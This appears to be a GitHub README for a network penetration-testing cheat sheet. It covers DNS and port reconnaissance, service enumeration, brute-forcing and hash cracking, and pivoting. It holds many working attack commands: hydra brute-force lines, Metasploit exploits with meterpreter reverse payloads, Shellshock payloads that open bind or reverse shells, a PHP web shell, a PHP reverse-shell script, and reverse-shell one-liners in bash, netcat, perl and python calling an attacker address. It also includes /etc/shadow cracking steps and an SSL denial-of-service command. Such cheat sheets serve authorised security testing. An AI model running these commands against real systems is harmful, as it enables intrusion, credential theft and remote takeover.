Skip to content

rowbot1/network-pentest

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 

Repository files navigation

Pre-engagement

Log all commands of the current session

script engagement_x.log
...
exit # when finished

Use keepnote or other to document findings
Create a screenshot of the selected area and save it at home directory

$ alias ss='import ~/ss-$(date +%F_%H%M_%S).png'

Set the Target IP Address to the $ip system variable


$ export ip=target_ip

General methodology

For every open port TCP/UDP
    Find service and version
    Find known service bugs
    Find configuration issues
    Run nmap port scan / banner grabbing
Google
    Every error message
    Every URL path
    Every parameter to find versions/apps/bugs
Run metasploit enum
Run nmap vuln scan
Run all steps of each service below
searchsploit every service
Google
    Every version exploit db
    Every version vulnerability
Run metasploit exploits
If app has auth:
    User enumeration
    Password bruteforce
    Default credentals google search
If everything fails try:

$ nmap --script exploit -Pn $ip

DNS

Find name servers

$ host -t ns guif.re

Find email servers

$ host -t mx guif.re

Subdomain bruteforcing

$ for ip in $(cat list.txt); do host $ip.guif.re; done

Reverse dns lookup bruteforcing

$ for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

Zone transfer request

$ host -l guif.re ns1.guif.re

$ dnsrecon -d guif.re -t axfr

Finds nameservers for a given domain

$ host -t ns guif.re | cut -d " " -f 4 #

$ dnsenum guif.re

Nmap zone transfer scan

$ nmap guif.re --script=dns-zone-transfer -p 53

Finds the domain names for a host.

$ whois guif.re

Find the IP and authoritative servers.

$ nslookup guif.re

Finds missconfigure DNS entries.

$ host -t ns guif.re

TheHarvester finds subdomains in google, bing, etc

$ python theHarvester.py  -l 500 -b all -d guif.re

Port scanning

Automated:

#!/bin/bash
nmap $1 -F                  # first, quick scan
nmap -sV -A -O -T4 -sC $1   # verify services, Os, run scripts
nmap -p 1-65535 -T5 -sT $1  # scan all ports TCP
nmap -p 1-10000 -T4 -Su $1  # UDP scan

Scan all 65536 ports TCP/UDP, nmap does only 1000 first ports by default
Find hosts alive

nmap -sP 192.168.0.1/24

Open ports scan (slow)

$ nmap -p 1-65535 -T4 -sS $ip

Services finding enumeartion

$ sudo nmap -sV -A -O -T4 $ip

3way handshake scan

$ nmap -nvv -w 1 IP 22-8

UDP scan

$ nmap -nvv -sU -w 1 $ip 22-81

UDP scanning consists on sending an empty UDP packet. Open: reply back. Closed: ICMP unreachable packet is received
ARP Scan

$ arp-scan 10.10.10.1/28 -I eth0

Nmap ping scan

$ sudo nmap -sn -oA nmap_pingscan 10.10.10.1/24

Nmap SYN/Top 100 ports Scan

$ nmap -sS -F -oA nmap_fastscan 10.10.10.1/24

Services versions scan

$ nmap -sV $ip

Run the default scripts and normal port scan against all the found ports

$ nmap -sC $ip

Run all nmap scan scripts against found ports.

$ nmap -Pn -sV -O -pT:{TCP ports found},U:{UDP ports found} --script *vuln* $ip

Port scan with file report:

$ nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T 192.168.15.201

Full vulnerability scanning:

$ mkdir /usr/share/nmap/scripts/vulnscan; cd /usr/share/nmap/scripts/vulnscan; git clone https://github.com/scipag/vulscan.git; nmap -sS -sV --script=/usr/share/nmap/scripts/vulnscan/vulscan.nse $ip

Identify unknown services

$ amap -d $ip <port>

SMB

Versions 1,2,3. TCP 139, 445 and many UDP ports.
Enumeration

$ nmblookup -A $ip

$ enum4linux -a $ip

Versions Samba 2.2.x are red flag
A null SMB session can be used to gather passwords and useful information from SMB 1.
Null session and extract information.

$ nbtscan -r $ip

Version

msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run

MultiExploit

msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run

Quick enum:

$ nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip

Quick vuln scan:

$ nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip

Full enum and vuln scanning:

$ nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip

Full enum & vuln scan:

$ nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip

Mount:

$ smbclient //$ip/share -U username

Anonymous mount:

$ smbclient //$ip/share # hit enter with blank password

Worth testing eternalblue
Bruteforce

$ hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb

Any metasploit exploit through Netbios over TCP in 139, you need to set:

>  set SMBDirect false

Netbios

Dumping the netbios table:

$ nmap -Pn -sUC -p137 $ip

NFS

Show all mounts

$ showmount -e $ip

Mount a NFS share

$ mount $ip:/vol/share /mnt/nfs

Web

$ nikto -host $ip

$ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web_Content/Top1000-RobotsDisallowed.txt; gobuster -u http://$ip -w Top1000-RobotsDisallowed.txt

$ wfuzz -c -z list.txt --sc 200 http://$ip

Directory discovery

$ dirb $ip /usr/share/wordlists/dirb/common.txt

$ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip

$ gobuster -u http://$ip/  -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e

$ gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e

$ cd /root/dirsearch; python3 dirsearch.py  -u http://$ip/ -e .php

Banner grabbing

./whatweb $ip # identifies all known services

Methods testing

$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip

Bruteforcing authentication

$ hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin

Vulnerability scanning:

$ nikto -host http://$ip

$ nmap --script=http-vuln* $ip 

Test against SQLI

sqlmap -u "http://$ip/?query" --data="user=foo&pass=bar&submit=Login" --level=5 --risk=3 --dbms=mysql  

Coldfusion vulnerability scanning

$  nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip

Bruteforce basic auth

$ hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path

WebDav

test

$ davtest -move -sendbd auto -url http://$ip:8080/webdav/

$ cadaver http://$ip:8080/webdav/

Mysql

$ nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306

Nmap scan

$ nmap -sV -Pn -vv -script=mysql* $ip -p 3306

Vuln scanning:

$ sqlmap -u 'http://$ip/login-off.asp' --method POST  --data 'txtLoginID=admin&txtPassword=aa&cmdSubmit=Login' --all --dump-all

If Mysql is running as root and you have acces, you can run commands:

mysql> select do_system('id');
mysql> \! sh

MsSql

Enumerate MSSQL Servers on the network

msf > use auxiliary/scanner/mssql/mssql_ping
$ nmap -sU --script=ms-sql-info $ip

Bruteforce MsSql

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login

Gain shell using gathered credentials

msf > use exploit/windows/mssql/mssql_payload
    msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Log in to a MsSql server:

# root@kali:~/dirsearch# cat ../.freetds.conf
[someserver]
host = $ip
port = 1433
tds version = 8.0
user=sa

root@kali:~/dirsearch# sqsh -S someserver -U sa -P PASS -D DB_NAME

Redis

Enumerate:

$ nmap -p6379 --script redis-info $ip

Client:

$ redis-cli -h $ip

Memcached

Enumerate:

$ nmap -p11211 --script memcached-info $ip

Extract data:

msf > use auxiliary/gather/memcached_extractor

SMTP

Always do users enumeration

smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

>use auxiliary/scanner/smtp/smtp_enum

Command to check if a user exists

>VRFY root

Command to ask the server if a user belongs to a mailing list

>EXPN root

Enumeration and vuln scanning:

$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

Bruteforce

$ hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V

Metasploit user enumeration

use auxiliary/scanner/smtp/smtp_enum

Testing for open relay

telnet $ip 25
EHLO root
MAIL FROM:[email protected]
RCPT TO:[email protected]
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT

RPC (135)

Enumerate, shows if any NFS mount exposed:

$ rpcinfo -p $ip

$ nmap $ip --script=msrpc-enum

msf > use exploit/windows/dcerpc/ms03_026_dcom

FTP enumeration

Enumerate:

$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Bruteforce

$ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21

Bruteforce with metasploit

$ msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login

Vuln scan

$  nmap --script=ftp-* -p 21 $ip

TFTP

If unathenticated access is allowed with write permissions you can upload a shell:

$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]

SSH

User enumeration

msf > use auxiliary/scanner/ssh/ssh_enumusers

$ python /usr/share/exploitdb/platforms/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $ip

Bruteforce

$ hydra -v -V -l root -P password-file.txt $ip ssh


With list of users:

$ hydra -v -V -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 192.168.33.251 ssh

You can use *-w* to slow down

SSL

Open a connection

$ openssl s_client -connect $ip:443

Basic SSL ciphers check

$ nmap --script ssl-enum-ciphers -p 443 $ip

Look for unsafe ciphers such as Triple-DES and Blowfish
Very complete tool for SSL auditing is testssl.sh, finds BEAST, FREAK, POODLE, heart bleed, etc...

Simple Network Management Protocol (SNMP)

It is a network protocol used for collecting organizing and exchanging information between network devices
Runs on managed switches, routers, and server OSs for monitoring purposes. SNMP is accessed upon providing a valid community string within a UDP datagram to port 161. It is usually public. Versions 1,2 and 3. You can see running processes, open ports, users, windows version, installed software.
Enumeration

$ for community in public private manager; do snmpwalk -c $community -v1 $ip; done

$ snmpwalk -c public -v1 $ip

$ snmpenum $ip public windows.txt

Less noisy:

$ snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25

Based on UDP, stateless and susceptible to UDP spoofing

$ nmap -sU --open -p 16110.1.1.1-254 -oG out.txt

$ snmpwalk -c public -v1  10.1.1.1 # we need to know that there is a community called public

$ snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerate windows users

$ snmpwalk 5c public 5v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2 # enumerates running processes

$ nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $ip

$ snmp-check -t $ip -c public

Bruteforce the community names:

$ onesixtyone -c dict.txt -i $ip

Against cisco:

use auxiliary/scanner/snmp/cisco_config_tftp

POP3

Test authentication:

telnet $ip 110
USER uer@$ip
PASS admin
list
retr 1

Finger

Users enumeration

$ finger-user-enum.pl -U users.txt -t $ip

RDP

Bruteforce

$ ncrack -vv --user administrator -P password-file.txt rdp://$ip

$ hydra -t 4  -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip

RPC

Enum

$ nmap $ip --script=msrpc-enum

Exploit:

msf > use exploit/windows/dcerpc/ms03_026_dcom

Kerberos

Test MS14-068

LDAP

Enumeration:

$ ldapsearch -h $ip -p 389 -x -b "dc=mywebsite,dc=com"

Kerberos

Runs on port 88, password management port 464.
Passive network sniffing:

$ kerbcrack

User enumeration:

$ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip

Memory password extraction (pass the ticket):

$ Mimikatz

Email addresses enumeration

Find emails in google, bing, pgp etc

$ theharvester -d $ip -b google

Contact information for the domains they host

$ whois $ip

Find emails and employee name with Recon-ng:

$ recon-ng; use module; set DOMAIN $ip; run;
recon/contacts/gather/http/api/whois_pocs

Find xss published ad xssed.co

recon/hosts/enum/http/web/xssed

Find subdomain

recon/hosts/gather/http/web/google_site

Finds IPs close to the domain and possible new domains

recon/hosts/gather/http/web/ip_neighbor

Google search

site:xxx -site:www.xxx
filetype: look for specific documents, pdf, docx, etc..
inurl
intitle
Others https://www.exploit-db.com/google-hacking-database/

Vulnerability scanning

Search services vulnerabilities

$ searchsploit --exclude=dos -t apache 2.2.3

$ msfconsole; > search apache 2.2.3

$ nmap -v -T4 --script="*-vuln-*" $ip

nmap has many vulnerability scanning NSE scripts in /usr/share/nmap/scripts/
OpenVAS
    Powerful vulnerability scanner with thousands of scan checks. Setup:

$ openvas-setup; openvas-adduser; gsd

Password cracking

MD5 32 hex characters.
SHA-1 40 hex characters.
SHA-256 64 hex characters.
SHA-512 128 hex characters.
Find the type of hash:

$ hash-identifier

Find hash type at https://hashkiller.co.uk
Running john will tell you the hash type even if you don't want to crack it:

$ john hashes.txt

Paste the entire /etc/shadow in file and run

$ john hashes.txt

Paste the entire /etc/shadow in file and run

$ john hashes.txt

GPU cracking:

$ hashcat -m 500 -a 0 -o output.txt -remove hashes.txt /usr/share/wordlists/rockyou.txt

CPU cracking:

$ john --wordlist=/usr/share/wordlists/rockyou.txt 127.0.0.1.pwdump

Cracking */etc/shadow*:

$ unshadow /etc/passwd /etc/shadow /tmp/combined; john --wordlist=<any word list> /tmp/combined

Generating wordlists

$ crunch 6 6 0123456789ABCDEF 5o crunch1.txt

Online rainbow tables:

https://crackstation.net/
http://www.cmd5.org/
http://crackhash.com/
https://hashkiller.co.uk/md5-decrypter.aspx
https://www.onlinehashcrack.com/
http://rainbowtables.it64.com/
http://www.md5online.org/

Transfering files

First step after gaining access to a remote machine is to upload new tools.
Linux tools: netcat, curl, wget
Windows: ftp, tftp, power shell script to echo and write.
Download file with curl:

$ curl -O http://host/file

Upload a file with put:

$ curl --upload-file shell.php --url http://$ip/shell.php --http1.0

Start a web server in your local machine serving files within the current folder:

$ python -m SimpleHTTPServer

$ php -S $ip:80

Send files using different commands:

$ nc -nlvp 4444 > incoming.exe

As an FTP server, metasploit has built in one:

use auxiliary/server/ftp
auxiliary/server/tftp

SMB share server:

python smbserver.py WORKSPACE /dir

Curl put:

$ curl -T 'file' 'http://$ip'

Linux, mounting a samba share:

smbclient -L 1.1.1.1 --no-pass

Shellshock

The following tool will test it.

$ git clone https://github.com/nccgroup/shocker; cd shocker; ./shocker.py -H $ip  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose;  ./shocker.py -H $ip  --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose

You can also:

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80

$ curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status

Shellshock over SSH:

$ ssh username@$ip '() { :;}; /bin/bash'

HeartBleed

Test web server

$ sslscan $ip:443

Tunneling your traffic through another host

$ sshuttle -r root@$ip 10.10.10.0/24

Port forwarding

Simplest type of traffic redirection, consists on accepting traffic from one address and port port and redirecting it to another address and port.
It can be useful to bypass address and port based filters. Rinetd is a linux tool to do it.

Local port forwarding

Creates an encrypted tunnel through two machines and have traffic redirected to a final host and port, similar to port forwarding This is useful when you are trying to connect from your machine to a destination using a gateway. The syntax is:

$ ssh gateway_host -L local_port:remote_host:remote_port

You can later create a SSH session to the local port and have and SSH tunneled to destination:

$ ssh hop_machine -L 31337:banned_machine:22
$ ssh -p 31337 localhost

Remote port forwarding

It creates a tunnel from the target machine to your local machine, which allows connecting to an arbitrary port on the target. Useful if the target is in a non-routable network from your local machine. This is useful when you are trying to connect to a host, behind a firewall that blocks incoming connections. This technique works as the previous one, but the connection is started from the gateway. The syntax is:

$ ssh <gateway> -R <remote port to bind>:<local host>:<local port>

Dynamic Port Forwarding

Allows to create a tunnel from the target to your machine, and have the traffic routed to any host through target. You can configure a local port to forward traffic to multiple destinations passing through a single host. It is similar to local port forwarding but allows multiple destinations. It uses the SOCKS protocol. The syntax is:

$ ssh -D local_port remote_add 

The connection of the previous command is established at port 22 of remote addr.

Pivoting

1. drop 3proxy.exe
2. Set up a config file:

 allow *_
internal IP_SAME_NETWORK
external IP_OTHER_NETWORK
socks -p1081

3. Add to */etc/proxychains.conf*:

socks4  IP_SAME_NETWORK 1081

4. Scan:

$ proxychains nmap -sT -Pn IP_OTHER_NETWORK-250 --top-ports=5

Double-pivoting

Pivoting through two different networks:
First, create a dynamic port forwarding through the first network:

$ ssh -f -N -D 9050 [email protected]

Edit */etc/proxychains.conf* and add as default gateway:

socks4 127.0.0.1 9050

Use the proxy to create a second dynamic port forward to the second network:

$ proxychains ssh -f -N -D 10050 [email protected] -p 22

Edit again */etc/proxychains.conf* and add as default gateway:

socks4 127.0.0.1 10050

You can now use proxychains to pivot to the target network:

$ proxychains nmap -sTV -n -PN 10.1.2.1 -254

CVEs

http://www.cvedetails.com/
https://www.exploit-db.com/

Internet explorer 6

Vulnerable to msf exploit(ms10_002_aurora)

Lists

/usr/share/seclists/
/usr/share/wordlist/
/usr/share/metasploit-framework/data/wordlists/

Minimal web server

$ for i in 1 2 3 4 5 6 7; do echo -e '200 OK HTTP/1.1\r\nConnection:close\r\n\r\nfoo\r\n' |nc -q 0 -klvvp 80; done

Shells

PHP

<?php echo '<pre>'; echo shell_exec($_GET['cmd']); echo '</pre>'; ?>

Kali shells

/usr/share/webshells/...

/usr/share/webshells/php/php-reverse-shell.php

Reverse shells

If connections drops or can not be established, try different ports 80,443,8080...
Best PHP reverse shell:

<?php
echo 'running shell';
$ip='YOUR_IP';
$port='YOUR_PORT';
$reverse_shells = array(
    '/bin/bash -i > /dev/tcp/'.$ip.'/'.$port.' 0<&1 2>&1',
    '0<&196;exec 196<>/dev/tcp/'.$ip.'/'.$port.'; /bin/sh <&196 >&196 2>&196',
    '/usr/bin/nc '.$ip.' '.$port.' -e /bin/bash',
    'nc.exe -nv '.$ip.' '.$port.' -e cmd.exe',
    "/usr/bin/perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"".$ip.":".$port."\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
    'rm -f /tmp/p; mknod /tmp/p p && telnet '.$ip.' '.$port.' 0/tmp/p',
    'perl -e \'use Socket;$i="'.$ip.'";$p='.$port.';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\''
);
foreach ($reverse_shells as $reverse_shell) {
   try {echo system($reverse_shell);} catch (Exception $e) {echo $e;}
   try {shell_exec($reverse_shell);} catch (Exception $e) {echo $e;}
   try {exec($reverse_shell);} catch (Exception $e) {echo $e;}
}
system('id');
?>

Using netcat

nc <attacker_ip> <port> -e /bin/bash

Using bash and TCP sockets

/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1

Using sh and TCP sockets

0<&196;exec 196<>/dev/tcp/<attacker_ip>/<port>; sh <&196 >&196 2>&196

Using telnet

telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

PHP and sh

php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl and sh

perl -e 'use Socket;$i="<attacker_ip>";$p=<port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl forking:

$ perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Reverse shell with python script:

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("IP",port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Proxy

Protocols

http://
http://
connect://
sock4://
sock5://

PPTP

Point-to-Point Tunneling Protocol provides remote access to mobile devices, uses TCP port 1723 for key exchange and IP protocol 47 (GRE) to encrypt data between peers.
Enumeration:

$ nmap –Pn -sSV -p1723 $ip

Bruteforce:

$ cat dic.txt | thc-pptp-bruter –u admin $ip

IPsec

Tries to solve the confidentiality/integrity problems of the IP protocol. It provides HMAC of the origin and encrypts data.
You can find hosts supporting Ipsec with:

$ ike-scan -q $iprange

Validate the follow:
DH group can be insecure, allowing passive decryption.
Preshared key (PSK) might be cracked.
Obtaining the XAUTH once the PSK is known.
For more info, refer to https://www.trustwave.com/Resources/SpiderLabs-Blog/Cracking-IKE-Mission-Improbable-(Part-1)/.

TLS

Enumerating supported protocols and cipher suites

$ python prober.py $ip

Enumerating supported features and extensions

$ nmap --script ssl-enum-ciphers -p443

Certificate review

$ nmap -p443 --script ssl-cert

You should validate that:
    The X.509 subject common name (CN) is correct for the service
    The issuer is reputable and certificate chain valid
    RSA or DSA public key values are longer than 2,048 bits
    DH public parameters are longer than 2,048 bits
    The certificate is valid and has not expired
    The certificate is signed using SHA-256
Vulnerabilities:
    POODLE against CBC mode ciphers within SSL 3.0
    BEAST against CBC mode ciphers via TLS 1.0
    Byte biases in RC4 ciphers across all SSL and TLS protocol versions
Validate if the key was generated with weak entropy:

$ nmap -p443 --script ssl-known-key $1

Test failback:

$ openssl s_client -connect $ip -no_tls1_2 -fallback_scsv

Test Dos:

$ thc-ssl-dos $ip

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published